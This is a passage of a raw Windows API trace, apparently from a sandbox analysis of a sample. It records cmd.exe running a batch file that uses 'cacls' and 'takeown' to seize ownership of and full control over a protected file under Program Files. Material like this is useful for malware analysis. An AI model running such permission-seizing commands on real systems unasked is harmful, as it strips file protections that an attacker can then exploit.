-13 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0271.890] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0271.891] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0271.891] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0271.891] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0271.891] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0271.891] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0271.891] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0271.891] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0271.891] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0271.891] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0271.891] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0271.891] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0271.891] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0271.891] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0271.891] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0271.891] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0271.892] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\" /E /G CIiHmnxMn6Ps:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x5eeda8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\" /E /G CIiHmnxMn6Ps:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x5eedf4 | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\" /E /G CIiHmnxMn6Ps:F /C", lpProcessInformation=0x5eedf4*(hProcess=0xb8, hThread=0xb0, dwProcessId=0xf5c, dwThreadId=0x424)) returned 1 [0271.899] CloseHandle (hObject=0xb0) returned 1 [0271.899] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0271.899] GetEnvironmentStringsW () returned 0x769df0* [0271.899] FreeEnvironmentStringsA (penv="=") returned 1 [0271.899] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0273.374] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0x5eed8c | out: lpExitCode=0x5eed8c*=0x0) returned 1 [0273.374] CloseHandle (hObject=0xb8) returned 1 [0273.374] _vsnwprintf (in: _Buffer=0x5eee74, _BufferCount=0x13, _Format="%08X", _ArgList=0x5eed94 | out: _Buffer="00000000") returned 8 [0273.374] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0273.374] GetEnvironmentStringsW () returned 0x76e348* [0273.374] FreeEnvironmentStringsA (penv="=") returned 1 [0273.374] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0273.374] GetEnvironmentStringsW () returned 0x76e348* [0273.374] FreeEnvironmentStringsA (penv="=") returned 1 [0273.375] DeleteProcThreadAttributeList (in: lpAttributeList=0x5eee20 | out: lpAttributeList=0x5eee20) [0273.375] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.375] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0273.402] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.402] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0273.402] _get_osfhandle (_FileHandle=0) returned 0x38 [0273.402] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0273.402] SetConsoleInputExeNameW () returned 0x1 [0273.402] GetConsoleOutputCP () returned 0x1b5 [0273.403] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0273.403] SetThreadUILanguage (LangId=0x0) returned 0x409 [0273.403] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x5ef5b4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0273.403] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0273.403] _get_osfhandle (_FileHandle=3) returned 0xb8 [0273.403] SetFilePointer (in: hFile=0xb8, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0273.403] _get_osfhandle (_FileHandle=3) returned 0xb8 [0273.403] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0273.404] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x5ef584, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x5ef584*=0xc2, lpOverlapped=0x0) returned 1 [0273.404] SetFilePointer (in: hFile=0xb8, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0273.404] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0273.404] _get_osfhandle (_FileHandle=3) returned 0xb8 [0273.404] GetFileType (hFile=0xb8) returned 0x1 [0273.404] _get_osfhandle (_FileHandle=3) returned 0xb8 [0273.404] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0273.404] _wcsicmp (_String1="takeown", _String2=")") returned 75 [0273.404] _wcsicmp (_String1="FOR", _String2="takeown") returned -14 [0273.404] _wcsicmp (_String1="FOR/?", _String2="takeown") returned -14 [0273.404] _wcsicmp (_String1="IF", _String2="takeown") returned -11 [0273.404] _wcsicmp (_String1="IF/?", _String2="takeown") returned -11 [0273.404] _wcsicmp (_String1="REM", _String2="takeown") returned -2 [0273.404] _wcsicmp (_String1="REM/?", _String2="takeown") returned -2 [0273.405] _tell (_FileHandle=3) returned 47 [0273.405] _close (_FileHandle=3) returned 0 [0273.405] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x5ef348 | out: _Buffer="\r\n") returned 2 [0273.405] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.405] GetFileType (hFile=0x3c) returned 0x2 [0273.405] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.405] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef320 | out: lpMode=0x5ef320) returned 1 [0273.405] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.405] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef338, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef338*=0x2) returned 1 [0273.405] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0273.406] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0273.406] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x5ef344 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0273.406] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x5ef344 | out: _Buffer=">") returned 1 [0273.406] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.406] GetFileType (hFile=0x3c) returned 0x2 [0273.406] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.406] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef324 | out: lpMode=0x5ef324) returned 1 [0273.406] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.406] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x5ef33c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x5ef33c*=0x1e) returned 1 [0273.406] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.406] GetFileType (hFile=0x3c) returned 0x2 [0273.406] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.406] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5c4 | out: lpMode=0x5ef5c4) returned 1 [0273.406] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.406] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x767730*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x5ef5dc, lpReserved=0x0 | out: lpBuffer=0x767730*, lpNumberOfCharsWritten=0x5ef5dc*=0x7) returned 1 [0273.407] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x5ef5e4 | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\" ") returned 59 [0273.407] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.407] GetFileType (hFile=0x3c) returned 0x2 [0273.407] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.407] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5bc | out: lpMode=0x5ef5bc) returned 1 [0273.407] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.407] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3b, lpNumberOfCharsWritten=0x5ef5d4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5d4*=0x3b) returned 1 [0273.407] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x5ef5f8 | out: _Buffer="\r\n") returned 2 [0273.407] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.407] GetFileType (hFile=0x3c) returned 0x2 [0273.407] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0273.407] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x5ef5d0 | out: lpMode=0x5ef5d0) returned 1 [0273.407] _get_osfhandle (_FileHandle=1) returned 0x3c [0273.407] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef5e8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x5ef5e8*=0x2) returned 1 [0273.407] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0273.407] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0273.407] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0273.407] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0273.407] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0273.407] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0273.408] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0273.408] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0273.408] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0273.408] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0273.408] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0273.408] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0273.408] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0273.408] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0273.408] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0273.408] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0273.408] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0273.408] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0273.408] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0273.408] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0273.408] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0273.408] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0273.408] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0273.408] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0273.408] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0273.408] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0273.408] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0273.408] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0273.408] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0273.408] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0273.408] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0273.408] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0273.408] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0273.408] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0273.408] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0273.408] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0273.408] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0273.408] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0273.408] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0273.408] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0273.408] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0273.408] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0273.408] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0273.408] SetErrorMode (uMode=0x0) returned 0x0 [0273.408] SetErrorMode (uMode=0x1) returned 0x0 [0273.408] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x76f930, lpFilePart=0x5ef394 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x5ef394*="Desktop") returned 0x1d [0273.408] SetErrorMode (uMode=0x0) returned 0x1 [0273.409] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0273.409] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0273.409] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0273.409] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0273.409] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x5ef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef120) returned 0xffffffff [0273.409] GetLastError () returned 0x2 [0273.409] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0273.409] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x5ef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef120) returned 0xffffffff [0273.409] GetLastError () returned 0x2 [0273.409] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0273.409] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x5ef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef120) returned 0x76cbb0 [0273.409] FindClose (in: hFindFile=0x76cbb0 | out: hFindFile=0x76cbb0) returned 1 [0273.409] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x5ef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef120) returned 0xffffffff [0273.410] GetLastError () returned 0x2 [0273.410] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x5ef120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5ef120) returned 0x76cbb0 [0273.410] FindClose (in: hFindFile=0x76cbb0 | out: hFindFile=0x76cbb0) returned 1 [0273.410] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0273.410] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0273.410] GetConsoleTitleW (in: lpConsoleTitle=0x5ef168, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0273.410] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0273.410] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0273.410] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0273.410] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0273.410] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0273.410] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0273.410] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0273.410] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0273.410] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0273.410] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0273.410] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0273.410] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0273.410] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0273.410] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0273.410] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0273.410] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0273.410] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0273.410] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0273.410] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0273.410] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0273.410] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0273.410] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0273.410] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0273.410] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0273.410] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0273.410] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0273.410] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0273.410] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0273.410] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0273.410] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0273.411] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0273.411] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0273.411] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0273.411] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0273.411] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0273.411] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0273.411] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0273.411] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0273.411] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0273.411] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0273.411] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0273.411] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0273.411] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0273.411] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0273.411] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0273.411] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0273.411] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0273.411] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0273.411] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0273.411] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0273.411] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0273.411] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0273.411] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0273.411] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0273.411] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0273.411] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0273.411] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0273.411] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0273.411] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0273.411] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0273.411] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0273.411] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0273.411] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0273.411] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0273.411] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0273.411] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0273.411] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0273.411] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0273.411] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0273.411] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0273.411] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0273.411] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0273.411] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0273.411] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0273.411] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0273.411] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0273.411] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0273.411] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0273.411] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0273.411] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0273.411] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0273.411] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0273.411] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0273.411] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0273.411] _wcsicmp (_String1="takeown", _String2="FOR") returned 14 [0273.412] _wcsicmp (_String1="takeown", _String2="IF") returned 11 [0273.412] _wcsicmp (_String1="takeown", _String2="REM") returned 2 [0273.412] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0273.412] SetErrorMode (uMode=0x0) returned 0x0 [0273.412] SetErrorMode (uMode=0x1) returned 0x0 [0273.412] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x76ce28, lpFilePart=0x5eec74 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x5eec74*="Desktop") returned 0x1d [0273.412] SetErrorMode (uMode=0x0) returned 0x1 [0273.412] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0273.412] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0273.412] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0273.412] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0273.412] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x5eea00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eea00) returned 0xffffffff [0273.412] GetLastError () returned 0x2 [0273.412] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0273.412] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x5eea00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eea00) returned 0xffffffff [0273.413] GetLastError () returned 0x2 [0273.413] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0273.413] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0x5eea00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eea00) returned 0x76fd88 [0273.413] FindClose (in: hFindFile=0x76fd88 | out: hFindFile=0x76fd88) returned 1 [0273.413] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0x5eea00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eea00) returned 0xffffffff [0273.413] GetLastError () returned 0x2 [0273.413] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0x5eea00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5eea00) returned 0x76fd88 [0273.413] FindClose (in: hFindFile=0x76fd88 | out: hFindFile=0x76fd88) returned 1 [0273.413] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0273.413] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0273.413] GetConsoleTitleW (in: lpConsoleTitle=0x5eeef4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0273.413] InitializeProcThreadAttributeList (in: lpAttributeList=0x5eee20, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x5eee04 | out: lpAttributeList=0x5eee20, lpSize=0x5eee04) returned 1 [0273.413] UpdateProcThreadAttribute (in: lpAttributeList=0x5eee20, dwFlags=0x0, Attribute=0x60001, lpValue=0x5eee0c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x5eee20, lpPreviousValue=0x0) returned 1 [0273.413] GetStartupInfoW (in: lpStartupInfo=0x5eee58 | out: lpStartupInfo=0x5eee58*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0273.413] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0273.413] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0273.413] _wcsnicmp (_String1="COPYCMD", 